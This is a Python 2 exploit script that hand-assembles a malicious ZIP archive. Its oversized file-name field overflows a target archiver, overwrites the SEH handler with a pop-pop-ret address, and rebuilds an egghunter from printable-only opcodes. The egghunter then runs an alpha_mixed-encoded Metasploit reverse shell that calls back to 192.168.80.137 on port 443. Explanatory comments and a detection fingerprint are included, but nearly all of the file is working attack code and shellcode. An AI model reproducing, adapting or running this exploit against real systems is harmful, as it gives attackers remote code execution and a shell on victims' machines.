#!/usr/bin/env python
filename = "exploit.zip"  # output archive; opened with mode "wb" at the end of the script, so it is overwritten on every run
from struct import pack
def p(x):
    """Pack *x* as a little-endian unsigned 32-bit value (struct format '<L')."""
    little_endian_dword = pack('<L', x)
    return little_endian_dword
# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.80.137 LPORT=443 -f c -e x86/alpha_mixed
# The first line is to ensure the correct stack alignment
#
# Second stage: a Metasploit reverse shell generated by the command above and
# run through the x86/alpha_mixed encoder.  The callback host and port are baked
# into the encoded bytes, so the observable behaviour of a process that executes
# this is an outbound TCP connection to that host on port 443.
#
# Layout of the string:
#   * 10 NOP bytes (0x90), then 81 E4 F0 FF FF FF = `and esp, 0xfffffff0`
#     (the "first line" the comment above refers to: 16-byte stack alignment
#     before the decoder runs);
#   * a short non-printable prefix (89 E2 DB C8 D9 72 F4) that appears to be
#     the encoder's fnstenv-based GetPC stub -- NOTE(review): not verified here;
#   * the remainder is the encoder's mostly printable decoder plus payload.
# The blob is opaque to the rest of this script: nothing below inspects its
# contents, only its length (it is folded into the fixed 4064-byte budget).
shellcode = (
"\x90" * 10 + "\x81\xE4\xF0\xFF\xFF\xFF"
"\x89\xe2\xdb\xc8\xd9\x72\xf4\x58\x50\x59\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"
"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
"\x59\x6c\x6d\x38\x4f\x72\x63\x30\x47\x70\x67\x70\x61\x70\x6f"
"\x79\x6b\x55\x36\x51\x4f\x30\x70\x64\x6c\x4b\x72\x70\x54\x70"
"\x6c\x4b\x46\x32\x44\x4c\x6e\x6b\x62\x72\x35\x44\x4c\x4b\x32"
"\x52\x36\x48\x64\x4f\x4d\x67\x72\x6a\x31\x36\x70\x31\x4b\x4f"
"\x4c\x6c\x37\x4c\x35\x31\x53\x4c\x77\x72\x74\x6c\x47\x50\x4a"
"\x61\x5a\x6f\x34\x4d\x55\x51\x59\x57\x78\x62\x49\x62\x50\x52"
"\x61\x47\x6c\x4b\x73\x62\x56\x70\x6e\x6b\x52\x6a\x57\x4c\x4c"
"\x4b\x52\x6c\x74\x51\x53\x48\x59\x73\x61\x58\x73\x31\x7a\x71"
"\x36\x31\x6c\x4b\x76\x39\x31\x30\x73\x31\x78\x53\x4e\x6b\x61"
"\x59\x57\x68\x49\x73\x46\x5a\x37\x39\x4e\x6b\x34\x74\x4e\x6b"
"\x76\x61\x58\x56\x64\x71\x49\x6f\x6e\x4c\x39\x51\x68\x4f\x54"
"\x4d\x47\x71\x6a\x67\x56\x58\x6d\x30\x61\x65\x78\x76\x53\x33"
"\x61\x6d\x49\x68\x77\x4b\x51\x6d\x64\x64\x34\x35\x58\x64\x36"
"\x38\x4e\x6b\x51\x48\x71\x34\x75\x51\x69\x43\x72\x46\x6e\x6b"
"\x36\x6c\x50\x4b\x6e\x6b\x72\x78\x65\x4c\x43\x31\x4b\x63\x4e"
"\x6b\x66\x64\x6e\x6b\x67\x71\x58\x50\x6b\x39\x37\x34\x56\x44"
"\x44\x64\x73\x6b\x51\x4b\x75\x31\x50\x59\x50\x5a\x50\x51\x39"
"\x6f\x39\x70\x31\x4f\x31\x4f\x73\x6a\x4c\x4b\x44\x52\x48\x6b"
"\x6e\x6d\x73\x6d\x30\x68\x47\x43\x45\x62\x73\x30\x63\x30\x61"
"\x78\x32\x57\x32\x53\x67\x42\x43\x6f\x36\x34\x61\x78\x52\x6c"
"\x62\x57\x55\x76\x36\x67\x59\x6f\x6e\x35\x6c\x78\x6a\x30\x35"
"\x51\x63\x30\x75\x50\x54\x69\x69\x54\x66\x34\x56\x30\x45\x38"
"\x71\x39\x4f\x70\x42\x4b\x73\x30\x79\x6f\x68\x55\x72\x70\x66"
"\x30\x66\x30\x42\x70\x77\x30\x76\x30\x77\x30\x30\x50\x31\x78"
"\x48\x6a\x54\x4f\x4b\x6f\x49\x70\x4b\x4f\x78\x55\x4a\x37\x30"
"\x6a\x66\x65\x62\x48\x4b\x70\x4e\x48\x36\x30\x4e\x69\x50\x68"
"\x33\x32\x45\x50\x56\x61\x4f\x4b\x4c\x49\x4a\x46\x31\x7a\x76"
"\x70\x32\x76\x42\x77\x51\x78\x4e\x79\x6e\x45\x31\x64\x45\x31"
"\x39\x6f\x78\x55\x6d\x55\x4f\x30\x52\x54\x76\x6c\x59\x6f\x30"
"\x4e\x44\x48\x51\x65\x5a\x4c\x71\x78\x58\x70\x6f\x45\x4f\x52"
"\x42\x76\x49\x6f\x79\x45\x62\x48\x62\x43\x70\x6d\x51\x74\x67"
"\x70\x4f\x79\x4d\x33\x63\x67\x42\x77\x63\x67\x66\x51\x49\x66"
"\x51\x7a\x44\x52\x31\x49\x61\x46\x4a\x42\x49\x6d\x72\x46\x4f"
"\x37\x43\x74\x57\x54\x65\x6c\x75\x51\x56\x61\x6c\x4d\x57\x34"
"\x57\x54\x62\x30\x38\x46\x73\x30\x72\x64\x73\x64\x46\x30\x76"
"\x36\x56\x36\x53\x66\x57\x36\x63\x66\x52\x6e\x72\x76\x32\x76"
"\x50\x53\x53\x66\x52\x48\x70\x79\x4a\x6c\x37\x4f\x4f\x76\x6b"
"\x4f\x48\x55\x4b\x39\x49\x70\x50\x4e\x52\x76\x52\x66\x6b\x4f"
"\x54\x70\x53\x58\x46\x68\x4c\x47\x57\x6d\x43\x50\x79\x6f\x7a"
"\x75\x4f\x4b\x4a\x50\x4d\x65\x6d\x72\x36\x36\x42\x48\x6c\x66"
"\x7a\x35\x4d\x6d\x4f\x6d\x79\x6f\x6a\x75\x75\x6c\x45\x56\x73"
"\x4c\x36\x6a\x6d\x50\x4b\x4b\x4d\x30\x73\x45\x44\x45\x6f\x4b"
"\x30\x47\x55\x43\x61\x62\x62\x4f\x71\x7a\x37\x70\x43\x63\x4b"
"\x4f\x6b\x65\x41\x41"
)
# Hand-assembled PKZIP container: one local file header, one central-directory
# entry and the end-of-central-directory record.  The byte counts (30, 46 and
# 22) match the fixed part of those three record types.  CRC-32 and both size
# fields are left at zero; the only non-trivial values are a DOS time/date, the
# file-name length 0x0fe4 (= 4068 = the 4064-byte budget plus ".txt" used for
# `payload` below) and the two central-directory size/offset fields.
# From a detection standpoint the distinctive shape is a single-entry archive
# whose central-directory entry declares a 4068-byte file name with every
# CRC and size field zero.
ldf_header = (
"\x50\x4B\x03\x04\x14\x00\x00"               # PK\x03\x04 local-file-header signature, version needed 0x14
"\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00"   # method 0, DOS time/date 0xACB7 / 0x34CE, zeroed CRC
"\x00\x00\x00\x00\x00\x00\x00\x00"           # zeroed compressed / uncompressed sizes
"\xe4\x0f" # File size -- 0x0fe4 = 4068 = 4064 + len(".txt"), the length of `payload` below
"\x00\x00\x00"
)
cdf_header = (
"\x50\x4B\x01\x02\x14\x00\x14"               # PK\x01\x02 central-directory signature, version made by / needed 0x14
"\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00"   # flags 0, method 0, same DOS time/date, zeroed CRC
"\x00\x00\x00\x00\x00\x00\x00\x00\x00"       # zeroed compressed / uncompressed sizes
"\xe4\x0f" # File size -- file-name length field of the central entry, 0x0fe4 = 4068
"\x00\x00\x00\x00\x00\x00\x01\x00"           # extra / comment length 0, disk 0, internal attrs 1
"\x24\x00\x00\x00\x00\x00\x00\x00"           # external attrs 0x24, local-header offset 0
)
eofcdf_header = (
"\x50\x4B\x05\x06\x00\x00\x00\x00\x01\x00\x01\x00"   # PK\x05\x06 EOCD signature, disk 0, 1 entry on disk / 1 total
"\x12\x10\x00\x00" # Size of central directory (bytes) -- 0x1012 = 4114 = 46-byte entry + 4068-byte name
"\x02\x10\x00\x00" # Offset of start of central directory, relative to start of archive -- 0x1002 = 4098 = 30-byte local header + 4068-byte name
"\x00\x00"         # archive comment length 0
)
# egghunter we are decoding:
#"\x66\x81\xCA\xFF"
#"\x0F\x42\x52\x6A"
#"\x02\x58\xCD\x2e"
#"\x3C\x05\x5A\x74"
#"\xEF\xB8\x54\x30"
#"\x30\x57\x8B\xFA"
#"\xAF\x75\xEA\xAF"
#"\x75\xE7\xFF\xE7"
#
# NOTE: Python 2 syntax throughout (print statements; str literals used as raw
# bytes).  The archive's file-name field is assembled below as a sequence of
# fixed-offset regions.  Each "[max:N]" printed is a hard budget: the padding
# expressions (`"C" * (130 - len(payload))` and the B/A/0x42 ones after them)
# silently become empty if a region overruns, which shifts every later offset;
# the three "[max:...]" prints are the only check that the layout still fits.
#
# The 32-byte egghunter listed above is not written into the file verbatim.
# The chunks labelled `# 1` .. `# 9` are printable-only instruction sequences
# (opcodes 25 = and eax,imm32; 2D = sub eax,imm32; 50 = push eax) that rebuild
# it one dword at a time on the stack at run time.  Chunk 1 additionally reads
# ESP (54 58 = push esp / pop eax) and chunk 2 starts with 5C = pop esp, so the
# pair relocates the stack pointer before the dwords are pushed.  `B8 54 30 30
# 57` inside the hunter is `mov eax, "T00W"`: the 4-byte egg tag it scans
# memory for, which is placed twice immediately before the shellcode below.
payload = "D" * 48  # filler up to the first decoder chunk
payload += "\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x54\x58" # 1 -- zero EAX, then push esp / pop eax
payload += "\x2d\x21\x55\x55\x55"
payload += "\x2d\x50\x55\x55\x55"
payload += "\x2d\x2d\x4f\x55\x55"
payload += "\x50"
payload += "\x5C\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x21\x55\x55\x55\x2D\x21\x54\x55\x55\x2D\x49\x6F\x55\x6D\x50" # 2 -- leading 5C = pop esp
payload += "\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x71\x21\x61\x75\x2D\x71\x21\x61\x75\x2D\x6F\x47\x53\x65\x50" # 3
print len(payload), '[max:' + str(130) + ']'  # region 1 budget check (Python 2 print statement)
payload += "C" * (130 - len(payload))  # pad region 1 to exactly 130 bytes (empty if overrun -- see note above)
payload += "\x74\xaa" # third jump left -- 74 xx = jz rel8, a short backward jump into the region just built
payload += "\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x44\x41\x7E\x58\x2D\x44\x34\x7E\x58\x2D\x48\x33\x78\x54\x50" # 4
payload += "\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x71\x7A\x31\x45\x2D\x31\x7A\x31\x45\x2D\x6F\x52\x48\x45\x50" # 5
payload += "\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x33\x73\x31\x2D\x2D\x33\x33\x31\x2D\x2D\x5E\x54\x43\x31\x50" # 6
print len(payload), '[max:' + str(212) + ']'  # region 2 budget check
payload += "B" * (212 - len(payload))  # pad region 2 to exactly 212 bytes
payload += "\x74\xaa" # second jump left -- same jz rel8 pattern as above
payload += "\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x45\x31\x77\x45\x2D\x45\x31\x47\x45\x2D\x74\x45\x74\x46\x50" # 7
payload += "\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x52\x32\x32\x32\x2D\x31\x31\x31\x31\x2D\x6E\x5A\x4A\x32\x50" # 8
payload += "\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x31\x2D\x77\x44\x2D\x31\x2D\x77\x44\x2D\x38\x24\x47\x77\x50" # 9
print len(payload), '[max:' + str(294) + ']'  # region 3 budget check
payload += "A" * (294 - len(payload))  # pad region 3 to exactly 294 bytes; offset 294 is where the SEH record starts
payload += "\x74\xaaXX" # NEXT SEH, will be 74 AC after mangling -- 4-byte nSEH slot; the author expects the target to rewrite the 0xaa displacement (presumably a character transform on the file name)
payload += p(0x0040322B) # SEH -> pop pop ret -- handler slot; an address in the 0x0040xxxx image range, presumably the vulnerable executable itself (no rebasing/ASLR)
payload += "T00WT00W" + shellcode  # 8-byte egg (tag twice) followed by the encoded reverse shell
payload += "\x42" * (4064-len(payload))  # pad to the 4064-byte budget (also silently empty if shellcode overruns it)
payload += ".txt"  # -> 4068 bytes in total = 0x0fe4, the name length advertised in cdf_header
print "Payload size:", len(payload)
# The same name is written twice -- after the local file header and after the
# central-directory entry -- so both name fields of the archive carry the full
# overflow buffer.  Mode "wb" truncates any existing output file.
f = open(filename, "wb")
f.write(ldf_header + payload + cdf_header + payload + eofcdf_header)
f.close()